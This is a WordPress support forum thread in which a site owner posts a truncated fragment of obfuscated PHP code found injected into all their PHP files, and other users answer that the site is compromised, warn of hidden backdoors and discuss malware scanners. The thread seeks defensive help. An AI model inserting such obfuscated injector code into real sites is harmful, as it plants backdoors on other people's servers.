Title: Code inserted into php files, was I hacked? Last modified: August 22, 2016 --- # Code inserted into php files, was I hacked? * [csinia](https://wordpress.org/support/users/chrisasolisgmailcom/) * (@chrisasolisgmailcom) * [11 years, 7 months ago](https://wordpress.org/support/topic/code-inserted-into-php-files-was-i-hacked/) * In seemingly all my PHP pages, what used to be : * * Has the following PHP code inserted before what is above : * >%x5c%x7822!ftm7- UVPFNJU,6<*27-SFGTOBSU”%x2f%50%x2e%52%x29%57%x65″,”qp%x5c%x7825!-uyfu%x5c%x7825) 3of)fepdosv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uq5c%x7825w%x5c%x7860Tx78257% x5c%x….. it goes on a long way ending with…… $eeuxovhjiw=substr($ksyusvtspe,( 49243-39130),(51-39)); $eeuxovhjiw($cldgokzydb, $rnaevocehn, NULL); $eeuxovhjiw =$rnaevocehn; $eeuxovhjiw=(514-393); $ksyusvtspe=$eeuxovhjiw-1; ?> * I have added quite a few plug ins, so I’m nervous about deleting the code without knowing what it is. Any ideas? Viewing 4 replies - 1 through 4 (of 4 total) * Thread Starter [csinia](https://wordpress.org/support/users/chrisasolisgmailcom/) * (@chrisasolisgmailcom) * [11 years, 7 months ago](https://wordpress.org/support/topic/code-inserted-into-php-files-was-i-hacked/#post-5415502) * Just FYI, I ran Sucuri and it said I’m clean. Do you recommend Sucuri or WordFence? * [The Hack Repair Guy](https://wordpress.org/support/users/tvcnet/) * (@tvcnet) * [11 years, 7 months ago](https://wordpress.org/support/topic/code-inserted-into-php-files-was-i-hacked/#post-5415536) * Hi, Wordfence is not a cleanup service, so will not be of great help after your site has been compromised. * Moderator [bcworkz](https://wordpress.org/support/users/bcworkz/) * (@bcworkz) * [11 years, 7 months ago](https://wordpress.org/support/topic/code-inserted-into-php-files-was-i-hacked/#post-5415561) * IMO, no legitimate plugin would add obfuscated code to all of your PHP files, I’m quite certain your site is compromised. Sucuri scans will not pick up all hacking modes, it can only analyze content sent to it by your server. I may be wrong, but I don’t think it would be that hard to hide from Sucuri if a hacker were determined enough. * If by some small chance I’m wrong and removing the code borks one of your plugins, you could always reinstall it as if it were newly acquired. Be prepared for the experience where removing all of this results in it returning shortly via some hidden back door. * [Daniel Cid](https://wordpress.org/support/users/ddsucurinet/) * (@ddsucurinet) * [11 years, 7 months ago](https://wordpress.org/support/topic/code-inserted-into-php-files-was-i-hacked/#post-5415688) * [@bcworkz](https://wordpress.org/support/users/bcworkz/): We explain here how our free sitecheck works: * [http://blog.sucuri.net/2012/10/ask-sucuri-how-does-sitecheck-work.html](http://blog.sucuri.net/2012/10/ask-sucuri-how-does-sitecheck-work.html) * The free sitecheck will not pick up all types of injections, specially backdoors and phishing. For a full audit, we have our paid server-side scanner that has a more comprehensive approach (a lot harder to bypass). * @csinia: This type of code is very common lately and I think related to: * [http://blog.sucuri.net/2014/10/wordpress-websites-continue-to-get-hacked-via-mailpoet-plugin-vulnerability.html](http://blog.sucuri.net/2014/10/wordpress-websites-continue-to-get-hacked-via-mailpoet-plugin-vulnerability.html) * But since that’s an old post, the payload may have changed. Viewing 4 replies - 1 through 4 (of 4 total) The topic ‘Code inserted into php files, was I hacked?’ is closed to new replies. ## Tags * [hacked](https://wordpress.org/support/topic-tag/hacked/) * In: [Hacks](https://wordpress.org/support/forum/plugins-and-hacks/hacks/) * 4 replies * 4 participants * Last reply from: [Daniel Cid](https://wordpress.org/support/users/ddsucurinet/) * Last activity: [11 years, 7 months ago](https://wordpress.org/support/topic/code-inserted-into-php-files-was-i-hacked/#post-5415688) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics